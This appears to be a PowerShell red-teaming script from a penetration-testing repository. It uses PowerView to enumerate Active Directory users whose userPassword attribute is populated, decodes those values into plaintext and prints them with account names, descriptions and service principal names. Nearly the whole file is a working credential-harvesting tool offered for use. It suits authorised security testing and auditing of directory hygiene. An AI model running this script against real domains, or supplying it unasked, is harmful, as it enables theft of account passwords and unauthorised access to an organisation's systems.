mgeeky-Penetration-Testing-.../red-teaming/Get-UserPasswordEntries.ps1

60 lines
1.6 KiB
PowerShell
Raw Normal View History

2020-03-02 15:35:18 +01:00
<#
This script enumerates user accounts in Active Directory and then collects
their .userPassword properties, decodes them and prints out.
Assuming we have PowerView's Get-DomainUser command available.
Usage:
PS> . .\Get-UserPasswordEntries.ps1
PS> Get-UserPasswordEntries
2021-10-24 23:11:42 +02:00
Mariusz Banach / mgeeky
2020-03-02 15:35:18 +01:00
#>
# This script requires PowerView 3.0 dev branch
# Import-Module powerview.ps1 -ErrorAction SilentlyContinue
Function Get-UserPasswordEntries
{
$num = 0
Get-DomainUser -Filter "(userpassword=*)" -Properties * | % {
$entry = $_
$passw = $entry | Select -ExpandProperty userpassword
$passw2 = $passw | % {[char][int]$_}
$passw3 = $passw2 -join ''
$name1 = $entry.samaccountname
try {
$desc = $entry.description
}
catch {
$desc = "<empty>"
}
try {
$name3 = $entry.serviceprincipalname
}
catch {
$name3 = "<empty>"
}
$num += 1
$obj = @{
SamAccountName = $name1
ServicePrincipalName = $name3
Description = $desc
UserPassword = $passw3
}
$object = new-object psobject -Property $obj
Write-Host $num".)"
Write-Host "SamAccountName:`t`t" $object.SamAccountName
Write-Host "Description:`t`t" $object.Description
Write-Host "ServicePrincipalName:`t" $object.ServicePrincipalName
Write-Host "UserPassword:`t`t" $object.UserPassword
Write-Host
}
Write-Host "Found in total: "$num" entries."
}